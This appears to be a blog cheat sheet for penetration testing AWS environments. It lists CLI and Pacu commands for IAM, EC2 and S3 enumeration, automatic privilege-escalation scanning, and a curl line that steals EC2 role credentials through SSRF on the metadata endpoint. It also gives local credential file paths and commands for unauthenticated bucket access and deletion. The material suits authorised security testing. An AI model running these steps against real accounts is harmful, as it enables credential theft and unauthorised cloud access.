Installation and Basic Commands
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install
#Login - Enter Client ID and Client_Secret
aws configure
#Login - Create a profile incase you have multiple accounts
aws configure --profile Some_NAME
#Get info about Access_key
aws sts get-caller-identity --profile Some_NAME
#Using Short Term Temp Creds
aws configure set aws_access_key_id [key-id] --profile ec2
aws configure set aws_secret_access_key [key-id] --profile ec2
aws configure set aws_session_token [token] --profile ec2
aws sts get-caller-identity --profile ec2
Exploitation using PACU
#Download and Install PACU
pip3 install -U pacu
#run pacu and create a session
pacu
0
AWS-Pentest
#Create AWS login Session - enter Access & Secret Key
set_keys
#Enum IAM permissions
exec iam__enum_permissions
#List all permission for the logged in user
whoami
#Enum EC2 Instances
exec ec2__enum
#List all the gathered data
data EC2
#Auto PrivEsc
exec iam__privesc_scan
Saved Credential Location #Windows - filename: credentials c:\Users\Name\.aws/credentials #Linux - filename: credentials /home/username/.aws/credentials
Important Things to Note
- If Access Key starts with AKI, it's a long-term credential
- if Account Number is present in a policy, its Inline, Customer Created Policy
Enumeration - Users
#List Users
aws iam list-users
#check if a given user is part of any groups
aws iam list-groups-for-user --user-name UserNameHere
#List AWS Managed Policies for a user
aws iam list-attached-user-policies --user-name UserNameHere
#List Inline Admin Created Policies for a user
aws iam list-user-policies --user-name UserNameHere
Enumeration - Groups & Policies
#List all Groups
aws iam list-groups
#List all users in a given group
aws iam get-group --group-name GroupNameHere
#List all manages policies that are attached to the specified IAM user
aws iam list-attached-user-policies --user-name [user-name]
#Lists the names of the inline policies embedded in the specified IAM user :
aws iam list-user-policies --user-name [user-name]
#List All IAM Roles - Roles can only attached only to a AWS compute resource
aws iam list-roles
#Lists all managed policies that are attached to the specified IAM role
aws iam list-attached-role-policies --role-name [ role-name]
#List the names of the inline policies embedded in the specified IAM role
aws iam list-role-policies --role-name [ role-name]
#List all Policies -Both inline and Managed Policies
aws iam list-policies
#List Policies attached to a group
aws iam list-attached-group-policies --group-name <group-name>
#Retrieves information about the specified managed policy
#AttachmentCount = Number of Entities this policy is used in
aws iam get-policy --policy-arn [policy-arn]
#Lists information about the versions of the specified manages policy
aws iam list-policy-versions --policy-arn [policy-arn]
#Retrieved information about the specified version of the specified managed policy
aws iam get-policy-version --policy-arn policy-arn --version-id [version-id]
#Retrieves the specified inline policy document that is embedded on the specified IAM user / group / role
aws iam get-user-policy --user-name [username] --policy-name [policy-name]
aws iam get-group-policy --group-name [group-name] --policy-name [policy-name]
aws iam get-role-policy --role-name [role-name] --policy-name [policy-name]
Enumeration - Instances & Other Services
#List all EC2 Instances in default region
#Lists Keypair name, Public/Private IP
#Try to access the Public Endpoints - try to exploit them
#Check roles
aws ec2 describe-instances
#Example - retrieve EC2 Temp Creds if a Server is Public and is vuln to SSRF
curl http://IP_Address/latest/meta-data/iam/security-credentials/jump-ec2-role
S3 Bucket
#OSINT Enum - Find S3 Buckets
cloud_enum -k Bucket_Company_Name
#Download Unauthenticated S3 Bucket files
aws s3 ls s3://<bucket-name> --region us-east-2 --no-sign-request
aws s3 cp s3://<bucket-name> --region us-east-2 --no-sign-request
#List S3 Bucket Contents
aws s3 ls s3://Bucket_name
#Download a file from s3 bucket
aws s3 cp s3://Bucket_name/file/path /path/to/save/fil
#Upload a file to s3 Bucket
aws s3 cp /path/to/upload/filename s3://Bucket_name/file/path
#Delte a file on S3 Bucket
aws s3 rm s3://Bucket_name/file/path
Comments
Post a Comment